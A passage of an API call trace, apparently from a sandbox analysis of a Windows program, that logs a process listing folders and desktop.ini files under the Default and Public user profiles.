dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.672] FindClose (in: hFindFile=0x8fef40 | out: hFindFile=0x8fef40) returned 1 [0256.672] CreateFileW (lpFileName="C:\\\\Users\\Default\\Saved Games" (normalized: "c:\\users\\default\\saved games"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.672] FindFirstFileW (in: lpFileName="C:\\\\Users\\Default\\Saved Games\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fed00 [0256.672] FindNextFileW (in: hFindFile=0x8fed00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.673] FindNextFileW (in: hFindFile=0x8fed00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.673] FindClose (in: hFindFile=0x8fed00 | out: hFindFile=0x8fed00) returned 1 [0256.673] CreateFileW (lpFileName="C:\\\\Users\\Default\\Videos" (normalized: "c:\\users\\default\\videos"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.673] FindFirstFileW (in: lpFileName="C:\\\\Users\\Default\\Videos\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fec00 [0256.673] FindNextFileW (in: hFindFile=0x8fec00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.673] FindNextFileW (in: hFindFile=0x8fec00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.674] FindClose (in: hFindFile=0x8fec00 | out: hFindFile=0x8fec00) returned 1 [0256.674] CreateFileW (lpFileName="C:\\\\Users\\Public" (normalized: "c:\\users\\public"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.674] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\*", lpFindFileData=0x123a3810 | out: lpFindFileData=0x123a3810*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fed40 [0256.674] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.674] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x436238c4, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccountPictures", cAlternateFileName="ACCOUN~1")) returned 1 [0256.674] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x37f05f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x37f05f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0256.675] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x37f05f6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0256.675] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d5bfea2, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d5bfea2, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0256.675] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0256.675] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0256.675] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0256.675] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0256.675] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0256.675] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.675] FindClose (in: hFindFile=0x8fed40 | out: hFindFile=0x8fed40) returned 1 [0256.675] CreateFileW (lpFileName="C:\\\\Users\\Public\\AccountPictures" (normalized: "c:\\users\\public\\accountpictures"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.676] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\AccountPictures\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x436238c4, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fe980 [0256.676] FindNextFileW (in: hFindFile=0x8fe980, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x436238c4, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.676] FindNextFileW (in: hFindFile=0x8fe980, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x436238c4, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0256.676] FindNextFileW (in: hFindFile=0x8fe980, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.676] FindClose (in: hFindFile=0x8fe980 | out: hFindFile=0x8fe980) returned 1 [0256.676] CreateFileW (lpFileName="C:\\\\Users\\Public\\Desktop" (normalized: "c:\\users\\public\\desktop"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.676] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Desktop\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x37f05f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x37f05f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fe980 [0256.677] FindNextFileW (in: hFindFile=0x8fe980, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x37f05f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x37f05f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.677] FindNextFileW (in: hFindFile=0x8fe980, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x37f05f6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0256.677] FindNextFileW (in: hFindFile=0x8fe980, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.677] FindClose (in: hFindFile=0x8fe980 | out: hFindFile=0x8fe980) returned 1 [0256.677] CreateFileW (lpFileName="C:\\\\Users\\Public\\Documents" (normalized: "c:\\users\\public\\documents"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.677] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Documents\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d5bfea2, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d5bfea2, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fefc0 [0256.680] FindNextFileW (in: hFindFile=0x8fefc0, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d5bfea2, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d5bfea2, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.680] FindNextFileW (in: hFindFile=0x8fefc0, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x37f05f6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0256.680] FindNextFileW (in: hFindFile=0x8fefc0, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0256.680] FindNextFileW (in: hFindFile=0x8fefc0, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0256.680] FindNextFileW (in: hFindFile=0x8fefc0, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d5bfea2, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d5bfea2, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d5bfea2, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0256.680] FindNextFileW (in: hFindFile=0x8fefc0, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.680] FindClose (in: hFindFile=0x8fefc0 | out: hFindFile=0x8fefc0) returned 1 [0256.682] CreateFileW (lpFileName="C:\\\\Users\\Public\\Downloads" (normalized: "c:\\users\\public\\downloads"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.682] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Downloads\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fea80 [0256.683] FindNextFileW (in: hFindFile=0x8fea80, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.683] FindNextFileW (in: hFindFile=0x8fea80, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0256.683] FindNextFileW (in: hFindFile=0x8fea80, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.683] FindClose (in: hFindFile=0x8fea80 | out: hFindFile=0x8fea80) returned 1 [0256.683] CreateFileW (lpFileName="C:\\\\Users\\Public\\Libraries" (normalized: "c:\\users\\public\\libraries"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.683] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Libraries\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fea80 [0256.683] FindNextFileW (in: hFindFile=0x8fea80, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.684] FindNextFileW (in: hFindFile=0x8fea80, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0256.684] FindNextFileW (in: hFindFile=0x8fea80, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e7, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 1 [0256.684] FindNextFileW (in: hFindFile=0x8fea80, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.684] FindClose (in: hFindFile=0x8fea80 | out: hFindFile=0x8fea80) returned 1 [0256.684] CreateFileW (lpFileName="C:\\\\Users\\Public\\Music" (normalized: "c:\\users\\public\\music"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.684] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Music\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, 